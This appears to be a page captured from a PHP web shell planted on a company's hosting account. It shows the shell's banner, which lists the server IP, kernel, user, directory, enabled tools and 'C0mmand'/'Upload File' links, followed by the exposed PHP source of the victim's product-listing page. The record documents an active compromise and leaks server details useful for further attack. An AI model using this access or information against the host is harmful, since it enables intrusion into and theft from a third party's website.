Server IP : 103.53.40.154 / Your IP : 3.135.190.244 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/advancepowerresearch.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Best Power Products Manufacturer & Supplier In Gurugram</title> <meta name="description" content="Advance Power Research is one of the leading manufacturer & supplier of high quality Power Products & Peripherals in Gurugram Haryana."> <?php include "top-links.php" ?> <style> .service{ box-shadow:1px 1px 3px 3px grey; padding:10px; } </style> </head> <body > <div class="page-wrapper"> <?php include "top-header.php" ?> <?php include "header.php" ?> <div class="inner-banner"> <div class="container"> <h3>All Product Categories</h3> <ul class="breadcumb"> <li><a href="<?php echo $wspath?>">Home</a></li> <li><span class="sep"><i class="fa fa-angle-right"></i></span></li> <li><span>All Product Categories</span></li> </ul> </div> </div> <div class="section pt-5"> <div class="container"> <div class="section-title text-center mb-lg-9 mb-md-7 mb-5"> <h2 class="title"> <span>All Product Categories</span></h2> <p>By carefully manufacturing, procuring, and supplying products.</p> </div> <div class="row row-cols-lg-4 row-cols-md-4 row-cols-sm-2 row-cols-1 "> <?php $sqltype = "SELECT * FROM `tbl_product`"; $runtype = mysqli_query($db,$sqltype) or die("Query Not run"); while($datatype = mysqli_fetch_assoc($runtype)){ ?> <div class="col-md-4"> <!-- <a href="service-detail.php"> --> <div class="service text-center" style="margin-bottom: 15px;"> <img width="100%" src="<?php echo $wspath?>admin/images/services/<?php echo $datatype['image']?>" alt="<?php echo $datatype['product_name']?>"> <div class="service-content-wrap"> <div class="service-content"> <!-- <div class="service-icon"> <i class="dlicon design_compass"></i> </div> --> <!--<a href=""><h3 class="title"></h3> --> <!--<li><a href=""></a></li>--> <a href="<?php echo $wspath?>product<?php echo $datatype['slug_link']?>.html"><h3 class="title btn" style="background-color:#e45842; color:white;"><?php echo $datatype['product_name']?></h3> </a> </div> </div> </div> <!-- </a> --> </div> <?php } ?> </div> </div> </div> <?php include "contact-footer-banner.php" ?> </div><!-- /.page-wrapper --> <?php include "footer.php" ?> </body> </html>